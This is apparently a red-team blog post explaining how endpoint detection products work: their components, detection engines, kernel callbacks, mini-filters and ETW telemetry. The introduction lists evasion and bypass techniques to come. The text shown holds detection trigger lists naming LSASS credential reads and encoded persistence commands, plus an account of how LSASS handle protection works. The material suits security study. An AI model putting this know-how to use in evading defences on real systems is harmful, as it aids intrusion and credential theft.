EDR Tradecraft: Internals, Detection, Evasion & Advanced Research





Technical reference on modern EDR architecture, detection mechanisms, evasion techniques, and reverse-engineering methodology. Covers kernel callback APIs, file-system mini-filters, ETW providers, the four detection-engine model, syscall gates (FreshyCalls, RecycledGate, SysWhispers4, Acheron, Sysplant), sleep obfuscation (Ekko, FOLIAGE, DreamWalkers), call-stack spoofing (SilentMoonwalk, VulcanRaven), ETW-TI hardware-breakpoint bypass, patchless AMSI bypass via VEH, BYOVD against the vulnerable-driver blocklist, and the eight-phase EDR research methodology.

Hi, I’m DebuggerMan, a Red Teamer. A modern EDR is a discrete set of components: a user-mode service, an injected DLL, one or more kernel drivers, a file-system mini-filter, an ETW consumer, and a transport thread that uploads telemetry to a cloud back-end. Detection capability is determined by which signals the product subscribes to and how those signals are correlated, not by the architecture itself. This post documents each component, each telemetry source, each Windows kernel API that the product hooks into, and the corresponding evasion or bypass technique. Coverage includes the FreshyCalls / RecycledGate / SysWhispers4 / Acheron / Sysplant syscall-gate family, the Ekko / FOLIAGE / Zilean / DreamWalkers sleep-obfuscation techniques, SilentMoonwalk and VulcanRaven for call-stack spoofing, ETW-TI and AMSI bypass via hardware breakpoints and Vectored Exception Handlers, the BYOVD landscape under Microsoft’s vulnerable-driver blocklist, and the techniques used to bypass Protected Process Light. All techniques are mapped to MITRE ATT&CK.

Part 1: EDR Internals

Component Inventory of a Modern EDR

A modern EDR agent decomposes into a fixed set of binaries on disk. Microsoft Defender for Endpoint (MDE) ships as MsSense.exe, MsSecFlt.sys, MsMpEng.exe, WdFilter.sys, plus supporting libraries. CrowdStrike Falcon ships as CSAgent.sys + CSFalconService.exe + CSFalconContainer.exe. SentinelOne ships as SentinelAgent.exe + SentinelMonitor.exe + SentinelMonitor.sys.

Vendor names differ. Architectural roles do not. Three components are always present:

| Component | Disk location | Function |
|---|---|---|
| Sensor service | Program Files\<Vendor>\… | Correlates telemetry, transports to cloud, applies tenant policy |
| File-system mini-filter | \SystemRoot\System32\drivers\…sys | Inspects file IRPs, optionally blocks |
| Kernel callback driver | typically same .sys | Registers Ps / Ob / Cm / image-load callbacks |

In addition, three subsystems are hosted across those components rather than as standalone files:

- Inline API hooks in `ntdll.dll`, installed by the injected user-mode DLL at process initialization.

- ETW provider subscriptions: generally 10–20 providers, including `Microsoft-Windows-Threat-Intelligence` (kernel-emitted security events).

- WFP callout drivers, when the product ships network inspection.

EDR vs EPP

EPP (Endpoint Protection Platform) and EDR are functionally distinct:

- EPP is preventive. Its primary control is blocking execution of known-bad artifacts via signatures, hash reputation, machine-learning classifiers on PE features, and AMSI integration.

- EDR is investigative and responsive. Its primary controls are detection, telemetry collection, investigation support, and response actions (process kill, host isolation, memory acquisition, remediation scripting).

Most modern agents bundle EPP and EDR functions into a single binary set; functional separation between the two persists internally even when packaging does not.

Note: Vendor marketing uses the terms EPP, AV, NGAV, and EDR interchangeably. Define terms precisely when scoping engagements or detection coverage to avoid ambiguity.

Adjacent Categories: XDR, NDR, MDR

EDR is one member of a broader detection-and-response category set:

- XDR (Extended Detection and Response) extends EDR telemetry beyond the host to additional sources: identity providers (Entra ID, Okta), SaaS audit logs (M365, Workspace), email security gateways, and cloud workload protection. Goal: cross-domain correlation. Implementation: usually the same vendor’s EDR plus connectors that ingest external feeds into the same backend.

- NDR (Network Detection and Response) operates on network-layer telemetry. Inputs include NetFlow / IPFIX, full packet capture, TLS handshake metadata (JA3/JA4), DNS resolution, and protocol-anomaly detection. NDR sits on the wire (sensor span ports, network TAPs, or virtual switches in cloud environments), not on the host.

- MDR (Managed Detection and Response) is a service model rather than a product category. A third-party SOC operates an EDR / NDR / XDR stack on the customer’s behalf, providing 24/7 triage, threat hunting, and incident response. The technology underneath is still EDR or XDR; MDR is the operational wrapper.

The kernel-level mechanics covered in this post apply identically across all four categories: the host sensor is unchanged.

User-Mode and Kernel-Mode Architecture





Architecture diagram first, then component-by-component.

Cloud-side console at top. User-mode in-process hooks bottom-left. Kernel-mode components bottom-right. Each detection-triggered alert is attributable to telemetry from one of these components.


User-mode component layout:

```
 your process            vendor process               service host
┌────────────┐ hooked    ┌────────────┐ named pipe   ┌────────────┐
│ app code   │──────────▶│ EDR DLL    │─────────────▶│ service    │──▶ cloud
│ ntdll.dll  │           │ (in-proc)  │              │ EDR.exe    │
│ ...        │           │ scanners   │              │ policy     │
└────────────┘           └────────────┘              └────────────┘
```

Kernel-mode component layout:

```
┌───────────────────────────────────┐
│       EDR kernel driver(s)        │
│ ┌─────────┐ ┌─────────┐ ┌────────┐│
│ │Ps cb    │ │Ob cb    │ │Cm cb   ││
│ │Ps cb img│ │Ps cb thd│ │Flt mgr ││
│ └─────────┘ └─────────┘ └────────┘│
└───────────────────────────────────┘
ETW subscription: TI, Kernel-Process, AMSI, .NET
```

IPC between user-mode and kernel-mode components is implemented by one of three mechanisms, depending on vendor design choices: filter communication ports (FltCreateCommunicationPort / FilterConnectCommunicationPort) for mini-filter ↔ user-mode service, ALPC ports for service ↔ injected DLL traffic, and named-section + named-event pairs for high-throughput shared-memory queues. Reverse-engineering a product begins by enumerating these IPC endpoints and identifying their owning components.

Detection Engines: Static, Dynamic, Heuristic, Machine Learning

Every EDR product implements detection through a layered pipeline of four engine types:

Static engine. Triggered on artifact materialization: file write, file open for execute, image-section map. Inputs: byte content, PE structure, import table, section entropy, embedded strings, packer fingerprints. Implementation: signature databases, YARA rules, hash reputation, ssdeep / TLSH fuzzy hashing. Lowest cost per evaluation; easily evaded by basic obfuscation or packing.

Dynamic engine. Triggered by runtime events: process create, thread create, image load, memory allocation, API invocation. Inputs: ETW providers, file-system mini-filter post-operations, user-mode inline hooks, process and thread notification callbacks. Evaluates sequences of operations against behavioral signatures (e.g., OpenProcess(LSASS) → ReadProcessMemory).

Heuristic engine. Correlates static and dynamic signals against composite rule expressions (Sigma rules, KQL queries, vendor-specific DSLs). Example expression: parent_image == winword.exe AND child_image == powershell.exe AND command_line CONTAINS "-enc" AND base64_decoded_length > 200. The heuristic engine typically owns the final verdict.
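The example expression above can be evaluated as a plain predicate over one process-creation event. The following Python sketch is illustrative only: the event dictionary shape, the regular expression, and the function names are assumptions, not any vendor's rule format.

```python
import base64
import re

# Assumption: the encoded blob is the token right after -enc / -EncodedCommand.
ENC_FLAG = re.compile(r"-enc\w*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def decoded_length(command_line: str) -> int:
    """Byte length of the base64 blob following the -enc flag, or 0 if absent/invalid."""
    match = ENC_FLAG.search(command_line)
    if not match:
        return 0
    try:
        return len(base64.b64decode(match.group(1), validate=True))
    except ValueError:  # binascii.Error is a ValueError subclass
        return 0

def office_spawns_encoded_powershell(event: dict) -> bool:
    """All four conditions of the example rule must hold (logical AND)."""
    return (
        event["parent_image"].lower().endswith("winword.exe")
        and event["child_image"].lower().endswith("powershell.exe")
        and "-enc" in event["command_line"].lower()
        and decoded_length(event["command_line"]) > 200
    )
```

The length threshold is what separates a long staged payload from a short, possibly benign encoded one-liner; each clause on its own would be far noisier.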

Machine learning engine. Two distinct subtypes:

- Static ML: gradient-boosted decision trees (XGBoost, LightGBM) over PE-derived features. Runs pre-execution. Produces a maliciousness score in milliseconds.

- Behavioral ML: sequence models (LSTMs, transformers) over event streams. Detects novel TTPs through similarity to training examples rather than literal pattern match. Higher latency, higher recall on novel attacks.

Execution order across the four engines: static at file materialization → static ML pre-execution → dynamic continuously during runtime → heuristic combining outputs of the prior three → behavioral ML in batched windows. ML typically contributes a numerical score; the heuristic engine produces the binary verdict and any automated response action.

The following dynamic-engine triggers are present in nearly every commercial EDR ruleset and account for the majority of detections against unsophisticated payloads:

```
Office process (winword/excel/outlook) spawning cmd.exe/powershell.exe/wscript.exe
Service creation by a non-installer parent process
Run-key (HKCU/HKLM Software\Microsoft\Windows\CurrentVersion\Run) write
ReadProcessMemory targeting lsass.exe from non-Microsoft-signed binary
PAGE_EXECUTE_READWRITE allocation > 1 page in private commit
WriteProcessMemory immediately followed by CreateRemoteThread (cross-process)
WMI __EventFilter + CommandLineEventConsumer subscription
schtasks /create with -EncodedCommand argument
Image load from MEM_PRIVATE region (unbacked code execution)
```

A payload exhibiting any of these patterns will be flagged by signature-only rule logic.
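To show what a sequence-based trigger looks like in practice, here is a small Python sketch of the "WriteProcessMemory immediately followed by CreateRemoteThread (cross-process)" pattern. The event fields (`source_pid`, `target_pid`, `op`) are a hypothetical normalized schema, and "immediately" is interpreted here as "the next event from the same source process".

```python
from typing import Dict, Iterable, List, Tuple

def write_then_remote_thread(events: Iterable[dict]) -> List[Tuple[int, int]]:
    """Return (source_pid, target_pid) pairs where a cross-process write is
    directly followed by a remote thread creation into the same target."""
    hits: List[Tuple[int, int]] = []
    pending: Dict[int, int] = {}  # source_pid -> target of its previous event, if a write
    for ev in events:
        src, dst, op = ev["source_pid"], ev["target_pid"], ev["op"]
        if src != dst and op == "WriteProcessMemory":
            pending[src] = dst
        elif src != dst and op == "CreateRemoteThread" and pending.get(src) == dst:
            hits.append((src, dst))
            pending.pop(src, None)
        else:
            pending.pop(src, None)  # any other event breaks the sequence
    return hits
```

Rules of this kind depend on event ordering rather than on any single call, which is why one unrelated intervening event is enough to defeat the naive form.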

Windows API Layers and Calling Conventions

Detection logic operates against a specific call chain. The path from user-mode application code to file-system on-disk operation is:

```
your code calls CreateFileW
        │
        ▼
kernel32.dll thunk
        │
        ▼
kernelbase.dll
        │
        ▼
ntdll.dll
  NtCreateFile stub  ◀──── EDR inline hook lives here
        │
        ▼
syscall instruction
        │
  (KiSystemCall64)
        │
        ▼
ntoskrnl.exe
  Nt!NtCreateFile (the real one)
        │
        ▼
FltMgr.sys → minifilter chain → NTFS.sys
```

Kernel API function prefixes encountered during driver reverse-engineering:

| Prefix | Subsystem |
|---|---|
| `Ex` | Executive (general kernel utilities) |
| `Ke` | Kernel core: synchronization primitives, scheduler, dispatcher |
| `Mm` | Memory Manager |
| `Ps` | Process and thread structures |
| `Ob` | Object Manager |
| `Cm` | Configuration Manager (registry) |
| `Io` | I/O Manager |
| `Flt` | File-system mini-filter framework |
| `Se` | Security Reference Monitor |
| `Rtl` | Runtime Library |

The Nt* and Zw* function pairs reference the same underlying kernel routine. Zw* variants set the previous-mode field to KernelMode before invocation, which causes the routine to skip access-mode checks intended for user-mode callers. Drivers should call Zw* from kernel context unless the driver explicitly wants user-mode semantics (e.g., capturing the original caller’s previous mode). Mixing the two without consideration of ExGetPreviousMode produces time-of-check-to-time-of-use vulnerabilities.

The x64 calling convention used throughout the Windows kernel and user-mode runtime:

```
RCX, RDX, R8, R9              first four integer/pointer arguments
XMM0..XMM3                    first four floating-point arguments
[RSP+0x20] and beyond         arguments 5+, pushed right-to-left
RAX                           return value (integer/pointer)
XMM0                          return value (float/double)
RBX, RBP, RSI, RDI, R12-R15   non-volatile (callee preserves)
RAX, RCX, RDX, R8-R11         volatile (caller preserves if needed)
[RSP+0x00..0x1F]              "shadow space" caller reserves 32 bytes
                              regardless of argument count
```
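When reading disassembly it helps to turn that table into a lookup. The Python sketch below maps a 1-based argument index to where the caller places it, as seen at the call site just before the CALL instruction executes; the function name is made up for illustration.

```python
INT_REGS = ["RCX", "RDX", "R8", "R9"]
FLOAT_REGS = ["XMM0", "XMM1", "XMM2", "XMM3"]

def arg_location(index: int, is_float: bool = False) -> str:
    """Location of argument `index` (1-based) at the call site."""
    if index < 1:
        raise ValueError("argument index is 1-based")
    if index <= 4:
        # Register choice is positional: a float in slot 2 uses XMM1, not XMM0.
        return (FLOAT_REGS if is_float else INT_REGS)[index - 1]
    # Slots 1-4 are the 32-byte shadow space, so slot n starts at RSP + 8*(n-1).
    return f"[RSP+0x{8 * (index - 1):X}]"
```

For example, `arg_location(5)` gives `[RSP+0x20]`, matching the table. Inside the callee every stack offset is 8 bytes larger, because CALL has pushed the return address.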

The user-mode-to-kernel-mode syscall ABI deviates from the standard convention in one respect: R10 carries the value of RCX (because syscall itself clobbers RCX to hold the user-mode return address). The canonical syscall stub sequence is:

```
mov r10, rcx
mov eax, <SSN>
syscall
ret
```

Kernel Driver Foundations

EDR kernel drivers are standard Windows Driver Model / Windows Driver Framework drivers. The minimum vocabulary required to read one:

- `DriverEntry` is the entry point; it populates the dispatch table and registers callbacks. `extern "C"` linkage is required when the driver is compiled as C++.

- `MajorFunction[IRP_MJ_*]` is an array of dispatch routines indexed by IRP major code. Empty slot = “not implemented”, I/O Manager auto-fails.

- `NTSTATUS` is the return type for almost everything. A set high bit (a negative value) means warning or error. Check with `NT_SUCCESS(status)`.

- `UNICODE_STRING` is length-prefixed and not guaranteed to be null-terminated. `Length` and `MaximumLength` are in bytes, not characters.

- `ExAllocatePool2` is the modern allocator. Pass `POOL_FLAG_NON_PAGED` for code that runs at IRQL ≥ 2; otherwise `POOL_FLAG_PAGED`.
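Two of these points trip people up often enough to be worth a worked example: the sign convention of `NTSTATUS` and the byte-based lengths of `UNICODE_STRING`. The Python sketch below mirrors the arithmetic only; the helper names are illustrative and not part of any Windows header.

```python
def nt_success(status: int) -> bool:
    """Mirror of NT_SUCCESS: true when the 32-bit value is non-negative."""
    return (status & 0xFFFFFFFF) < 0x80000000

def severity(status: int) -> str:
    """The top two bits of an NTSTATUS encode its severity."""
    names = ["success", "informational", "warning", "error"]
    return names[(status & 0xFFFFFFFF) >> 30]

def unicode_string_lengths(text: str, capacity_chars: int) -> tuple:
    """(Length, MaximumLength) in bytes for a UTF-16LE buffer of capacity_chars."""
    return len(text.encode("utf-16-le")), capacity_chars * 2
```

`STATUS_PENDING` (0x00000103) passes `nt_success`, while the warning `STATUS_BUFFER_OVERFLOW` (0x80000005) does not, which is why the "negative means error" shorthand is slightly too coarse. A nine-character name in a 16-character buffer yields `Length` 18 and `MaximumLength` 32.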

User-mode and kernel-mode are different ecosystems:

| | User mode | Kernel mode |
|---|---|---|
| Unhandled exception | Process dies | Whole system bug-checks |
| Cleanup | Auto on process exit | You must free it; leaks live until reboot |
| IRQL | Always PASSIVE_LEVEL | Can be DISPATCH_LEVEL (2) or higher, which restricts callable APIs |
| Library support | Full STL, runtime, exceptions | No C++ runtime, only SEH, no global ctors |
| Test environment | Local | Two boxes + WinDbg kernel link |

I/O Request Packets and Dispatch Routines



When a user-mode process invokes DeviceIoControl against an EDR-owned device object, the I/O Manager allocates an IRP structure and dispatches it to the corresponding entry in the driver’s MajorFunction array.

App → IO Manager → IRP + IO_STACK_LOCATION → MajorFunction dispatch → buffered/direct/neither buffer mode → IoCompleteRequest.


A dispatch routine in C, slimmed down:

```c
NTSTATUS HandleIoctl(PDEVICE_OBJECT dev, PIRP irp)
{
    PIO_STACK_LOCATION sp = IoGetCurrentIrpStackLocation(irp);
    ULONG code   = sp->Parameters.DeviceIoControl.IoControlCode;
    /* METHOD_BUFFERED: one kernel buffer serves as both input and output. */
    PVOID inBuf  = irp->AssociatedIrp.SystemBuffer;
    ULONG inLen  = sp->Parameters.DeviceIoControl.InputBufferLength;
    ULONG outLen = sp->Parameters.DeviceIoControl.OutputBufferLength;

    NTSTATUS rc   = STATUS_INVALID_DEVICE_REQUEST;  /* default for unknown codes */
    ULONG_PTR ret = 0;                              /* bytes returned to the caller */
    UNREFERENCED_PARAMETER(dev);

    switch (code) {
    case IOCTL_FETCH_PENDING_EVENTS:
        rc = DequeueEventsInto(inBuf, outLen, &ret);
        break;
    case IOCTL_PUSH_POLICY:
        rc = ApplyPolicyBlob(inBuf, inLen);
        break;
    }

    irp->IoStatus.Status = rc;
    irp->IoStatus.Information = ret;
    IoCompleteRequest(irp, IO_NO_INCREMENT);
    return rc;
}
```

Three buffer-transfer modes per IOCTL:

| Method | Input | Output | When you see it |
|---|---|---|---|
| `METHOD_BUFFERED` | Kernel copy | Kernel copy | Default. Small payloads. |
| `METHOD_IN_DIRECT` / `METHOD_OUT_DIRECT` | Buffered | Locked user pages, MDL | Large output, skip the copy. |
| `METHOD_NEITHER` | Raw user pointer | Raw user pointer | Driver does its own probing. Fragile. |

During reverse-engineering of a vendor driver, the IOCTL switch table constitutes the de facto interface between the user-mode service and the kernel driver. Each case corresponds to a discrete operation: dequeue pending telemetry, install a runtime hook, terminate a target PID, acquire a memory dump, push policy configuration. Enumerating these IOCTL codes and their argument structures yields the full driver-to-service protocol.
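Each 32-bit IOCTL code found in a switch table packs four fields according to the `CTL_CODE` macro layout: device type in bits 16-31, required access in bits 14-15, function number in bits 2-13, and transfer method in bits 0-1. A small Python decoder, offered as a sketch with illustrative function names, makes the buffer method and function index of each case visible at a glance:

```python
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]

def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Same bit layout as the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method

def decode_ioctl(code: int) -> dict:
    """Split a 32-bit IOCTL code back into its four fields."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
    }
```

For instance, `decode_ioctl(0x222007)` reports device type 0x22 (`FILE_DEVICE_UNKNOWN`), function 0x801, and `METHOD_NEITHER`, which flags that handler as one where the driver receives raw user pointers.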



Kernel Notification Callbacks

The kernel callback APIs are the primary telemetry-acquisition mechanism for any EDR. Callback registrations typically occur in DriverEntry. Each callback type produces a distinct event stream.

Five callback families. Each one is a separate registration call and a separate bypass surface.


Process Creation and Termination Callback

Registered via PsSetCreateProcessNotifyRoutineEx (or Ex2 for the extended variant). The callback receives:

- `EPROCESS` pointer and target PID

- `ParentProcessId`, the parent recorded by the kernel for the new process. This is not necessarily the process that issued the create call: when the parent is reassigned at creation time (PPID spoofing), the real creator is still visible in `CreatingThreadId`

- `ImageFileName` (full NT-path UNICODE_STRING)

- `CommandLine` (verbatim)

- `CreatingThreadId`, a `CLIENT_ID` holding the creator’s PID and TID

- `CreationStatus`, an `_Inout_` `NTSTATUS` field; setting it to a non-success value causes the process to fail to start before any image-load notifications fire.

Reference implementation:

```cpp
extern "C" void OnProcessLifecycle(
    PEPROCESS proc,
    HANDLE pid,
    PPS_CREATE_NOTIFY_INFO info)
{
    UNREFERENCED_PARAMETER(proc);
    if (!info) return;  // NULL info: process termination branch

    // Both fields are pointers to const strings and may be NULL.
    PCUNICODE_STRING image = info->ImageFileName;
    PCUNICODE_STRING cmd   = info->CommandLine;

    if (cmd && CmdLineMatchesPolicy(cmd)) {
        info->CreationStatus = STATUS_VIRUS_INFECTED;  // block creation
    }
    QueueLifecycleEvent(pid, image, cmd, info->ParentProcessId);
}
```

Operational constraints:

- The driver image must include the `IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY` characteristic, set via the `/integritycheck` linker flag.

- Windows enforces a hard limit of 64 simultaneously registered process-creation callbacks system-wide. Multiple co-resident security products consuming this resource may exhaust the slot pool.

This callback is the source for all process-lineage detection logic. Sysmon Event ID 1 (Process Create) is implemented on top of this callback.
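One lineage check that falls out of the callback data is a comparison between the recorded parent (`ParentProcessId`) and the process that actually issued the create call (`CreatingThreadId.UniqueProcess`). The Python sketch below assumes a hypothetical flattened event record as a driver might queue it; the class and function names are illustrative.

```python
from dataclasses import dataclass

@dataclass
class ProcessCreateEvent:
    """Hypothetical flattened view of the queued callback fields."""
    pid: int
    parent_pid: int    # PS_CREATE_NOTIFY_INFO.ParentProcessId
    creator_pid: int   # PS_CREATE_NOTIFY_INFO.CreatingThreadId.UniqueProcess
    image: str

def parent_differs_from_creator(ev: ProcessCreateEvent) -> bool:
    """True when the recorded parent is not the process that made the create call."""
    return ev.parent_pid != ev.creator_pid
```

Some legitimate brokered launches also produce a mismatch, so this is better treated as one input to correlation than as a verdict by itself.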

Thread Creation and Termination Callback

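Registered via PsSetCreateThreadNotifyRoutine. Arguments: the PID of the process that owns the thread, the TID, and a Create boolean (TRUE on creation, FALSE on termination). On creation the routine runs in the context of the creating thread, so comparing the current process ID against the owning PID identifies remote-thread creation. The callback receives only IDs; resolving them to EPROCESS / ETHREAD requires PsLookupProcessByProcessId and PsLookupThreadByThreadId, with ObDereferenceObject cleanup.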

This callback fires on every remote-thread creation, including those initiated via direct or indirect syscall paths. CreateRemoteThread-style injection produces a callback event regardless of user-mode hook state, because the trigger is in the kernel-mode NtCreateThreadEx implementation rather than in user-mode dispatch.

Image Load Callback

Registered via PsSetLoadImageNotifyRoutine. Fires for every image-section map operation: DLL, EXE, and SYS files. Callback receives:

- Loading PID

- Full image path (`UNICODE_STRING`)

- Image base address and size

- `IMAGE_INFO` flags including `SystemModeImage` (kernel image vs user image) and `ImageSignatureLevel`

No corresponding unload notification API exists. The callback is read-only: image loads cannot be blocked from this callback (blocking requires returning a non-success status from the upstream IRP_MJ_CREATE in the mini-filter). EDR consumers use image-load events to:

- Initiate a memory scan of the newly mapped section

- Update per-process module inventory

- Correlate DLL load path against expected signed-binary lookup tables (DLL sideload detection)

- Validate signing chain against image path heuristics

Unregister with PsRemoveLoadImageNotifyRoutine before driver unload.

Object Handle Pre-Operation Callback

Registered via ObRegisterCallbacks. This callback type can mutate operation parameters before the operation completes; it is not strictly observational. The pre-callback fires before OpenProcess / OpenThread / handle-duplicate operations return a handle to the caller, and may reduce the granted access mask.

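```cpp
OB_PREOP_CALLBACK_STATUS OnPreProcOpen(
    PVOID ctx,
    POB_PRE_OPERATION_INFORMATION pre)
{
    UNREFERENCED_PARAMETER(ctx);
    if (pre->KernelHandle) return OB_PREOP_SUCCESS;  // ignore kernel-mode opens
    if (pre->ObjectType != *PsProcessType) return OB_PREOP_SUCCESS;

    PEPROCESS target = (PEPROCESS)pre->Object;
    if (IsLsass(target)) {
        ACCESS_MASK strip =
            PROCESS_VM_READ | PROCESS_VM_WRITE |
            PROCESS_VM_OPERATION | PROCESS_DUP_HANDLE |
            PROCESS_CREATE_THREAD;
        // Create and duplicate operations use different members of the union.
        if (pre->Operation == OB_OPERATION_HANDLE_CREATE)
            pre->Parameters->CreateHandleInformation.DesiredAccess &= ~strip;
        else
            pre->Parameters->DuplicateHandleInformation.DesiredAccess &= ~strip;
    }
    return OB_PREOP_SUCCESS;
}
```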

The canonical deployment of this callback strips PROCESS_VM_READ, PROCESS_VM_WRITE, and PROCESS_VM_OPERATION from any handle whose target is lsass.exe. The caller’s OpenProcess invocation still succeeds and returns a valid handle, but querying the handle (for example NtQueryObject with ObjectBasicInformation) reveals that the granted access mask has been reduced, in many cases to little more than PROCESS_QUERY_LIMITED_INFORMATION. This is the implementation behind MDE’s credential-dumping protection. Identical logic protects csrss.exe, the EDR’s own user-mode service, and trusted Microsoft binaries.
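The effect of the strip is plain bit arithmetic on the requested access mask. The Python sketch below reproduces it using the documented values of the process access rights; the `STRIP` set matches the five rights removed in the callback listing above, and the function name is illustrative.

```python
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
PROCESS_ALL_ACCESS = 0x1FFFFF

STRIP = (PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION
         | PROCESS_DUP_HANDLE | PROCESS_CREATE_THREAD)

def granted_after_strip(desired: int) -> int:
    """Access mask left after the pre-operation callback clears the STRIP bits."""
    return desired & ~STRIP & 0xFFFFFFFF

def handle_can_read_memory(granted: int) -> bool:
    return bool(granted & PROCESS_VM_READ)
```

A request for `PROCESS_VM_READ | PROCESS_QUERY_LIMITED_INFORMATION` comes back as 0x1000 only, so the open appears to succeed while the later memory read fails with an access-denied error.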

Registry Operation Callback

Registered via CmRegisterCallbackEx. Fires for every registry operation in both pre-operation and post-operation phases. Callback capabilities:

- Inspect operation arguments (key path, value name, value data, requested access)

- Modify the operation’s output data and return status on post-operation

- Bypass the Configuration Manager entirely on pre-operation by returning `STATUS_CALLBACK_BYPASS`; the callback then assumes responsibility for completing the operation, including supplying any return data

CmCallbackGetKeyObjectIDEx resolves an opaque registry key context to its full path. This API is the principal reverse-engineering target when mapping a vendor driver’s registry-detection logic to specific hive paths.

Summary: Pre-operation callbacks can modify operation parameters and outcomes. Object post-operation callbacks are observational only, while registry post-operation callbacks can still change the returned data and status. Process creation and object pre-operation handle stripping on LSASS are the two callback-derived detections most commonly encountered during engagement work. Bypass strategies are covered in Part 3.



File-System Mini-Filter Architecture

fltmgr.sys is the kernel-mode framework that dispatches I/O requests through registered mini-filter drivers. Every file-system IRP (IRP_MJ_CREATE, IRP_MJ_READ, IRP_MJ_WRITE, IRP_MJ_SET_INFORMATION, IRP_MJ_QUERY_INFORMATION, and others) traverses registered mini-filters in descending altitude order (high-to-low) on the request path, then ascending altitude order (low-to-high) on the completion path.

Filter Manager dispatches IRPs through registered minifilters in altitude order. EDR sits high; AV sits below it.


A skeletal mini-filter registration:

```cpp
extern "C" NTSTATUS DriverEntry(PDRIVER_OBJECT drv, PUNICODE_STRING reg)
{
    UNREFERENCED_PARAMETER(reg);
    static const FLT_OPERATION_REGISTRATION ops[] = {
        { IRP_MJ_CREATE,          0, PreCreate,  PostCreate },
        { IRP_MJ_WRITE,           0, PreWrite,   nullptr },
        { IRP_MJ_SET_INFORMATION, 0, PreSetInfo, nullptr },
        { IRP_MJ_OPERATION_END }
    };
    static const FLT_REGISTRATION fltReg = {
        sizeof(FLT_REGISTRATION), FLT_REGISTRATION_VERSION, 0,
        nullptr, // contexts
        ops,
        FilterUnload,
        InstanceSetup,
        InstanceQueryTeardown,
        InstanceTeardownStart,
        InstanceTeardownComplete
    };
    NTSTATUS status = FltRegisterFilter(drv, &fltReg, &g_filter);
    if (!NT_SUCCESS(status)) return status;

    // Registration alone delivers no I/O; filtering must be started explicitly.
    status = FltStartFiltering(g_filter);
    if (!NT_SUCCESS(status)) FltUnregisterFilter(g_filter);
    return status;
}
```

Vocabulary worth committing to memory:

- Altitude: a string-formatted decimal number. Higher = closer to user. Allocated by Microsoft on the Allocated Filter Altitudes list. The anti-virus class occupies `320000-329998`; the activity-monitor class used by most EDR filters occupies `360000-389999`.

- Pre-op can short-circuit by returning `FLT_PREOP_COMPLETE`. It can opt into post-op via `FLT_PREOP_SUCCESS_WITH_CALLBACK`.

- Contexts attach state to volume / instance / file / stream / stream-handle objects and survive across IRPs.

- User-mode talk-back uses `FltCreateCommunicationPort` (kernel side) and `FilterConnectCommunicationPort` (user side). Spotting that import in a user-mode component identifies which binary talks to which mini-filter.
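Because altitudes are decimal strings, ordering a filter stack means comparing them numerically rather than lexically. The Python sketch below derives the pre-operation and post-operation call order for a set of filters; the filter names and altitude values are made up for illustration.

```python
from decimal import Decimal

def pre_op_order(filters: dict) -> list:
    """filters maps name -> altitude string. Highest altitude sees the request first."""
    return sorted(filters, key=lambda name: Decimal(filters[name]), reverse=True)

def post_op_order(filters: dict) -> list:
    """Completion travels back up the stack, lowest altitude first."""
    return list(reversed(pre_op_order(filters)))

# Hypothetical stack: names and altitudes are illustrative only.
stack = {"av_scanner": "328010", "activity_monitor": "385201.5", "encryption": "141100"}
```

With this stack, `pre_op_order(stack)` yields the activity monitor, then the scanner, then the encryption filter. `Decimal` is used because altitudes may carry a fractional part and a plain string comparison would rank "99999" above "100000.1".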

Ransomware behavioral detection is also implemented at the mini-filter level: the filter monitors per-process IRP rates and flags abnormal sequences such as high-frequency IRP_MJ_SET_INFORMATION (rename) plus IRP_MJ_WRITE against user document directories.
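A rate heuristic of this kind can be approximated with a per-process sliding window. The Python sketch below is a simplified model, not a vendor algorithm: the window length, the threshold, and the requirement that both operation types appear in the window are all assumptions chosen for illustration.

```python
from collections import defaultdict, deque

class RenameWriteRateMonitor:
    WATCHED = {"IRP_MJ_WRITE", "IRP_MJ_SET_INFORMATION"}

    def __init__(self, window_seconds: float = 10.0, threshold: int = 50):
        self.window = window_seconds
        self.threshold = threshold
        self.events = defaultdict(deque)  # pid -> deque of (timestamp, op)

    def observe(self, pid: int, op: str, timestamp: float) -> bool:
        """Record one operation; return True when pid crosses the threshold."""
        if op not in self.WATCHED:
            return False
        queue = self.events[pid]
        queue.append((timestamp, op))
        # Drop entries that have aged out of the window.
        while queue and timestamp - queue[0][0] > self.window:
            queue.popleft()
        ops_seen = {o for _, o in queue}
        return len(queue) >= self.threshold and ops_seen == self.WATCHED
```

A real filter would also scope the count to specific directories and file types, which this sketch leaves out.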



Event Tracing for Windows (ETW) Telemetry

ETW is the kernel’s first-class telemetry framework. Microsoft already instruments the kernel and core user-mode components with ETW providers; EDR products consume those providers rather than re-implementing equivalent instrumentation.

Providers emit events into kernel buffers. Sessions own the buffers. Consumers drain them in real-time or via .etl files.


ETW architecture comprises four actor types:

- Providers: kernel and user-mode components that emit events. Identified by GUID.

- Sessions: kernel-owned buffer pools that receive events from one or more providers. Created by a controller process.

- Consumers: processes that read events from sessions, either in real-time mode or by parsing recorded `.etl` files.

- Controllers: processes that create sessions, enable providers into sessions, and stop sessions. Tools: `logman.exe`, `xperf.exe`, `wpr.exe`.

Providers most commonly consumed by EDR products:

| Provider | Telemetry produced |
|---|---|
| `Microsoft-Windows-Threat-Intelligence` (ETW-TI) | Kernel-emitted security events: remote memory allocation and protection changes, section mapping, cross-process memory reads and writes, APC queuing, SetThreadContext. Consumer must run as PPL-Antimalware. |
| `Microsoft-Windows-Kernel-Process` | Process and thread lifecycle, image load and unload |
| `Microsoft-Windows-Kernel-File` | File create, read, write, delete operations |
| `Microsoft-Windows-Kernel-Network` | TCP / UDP connection state changes |
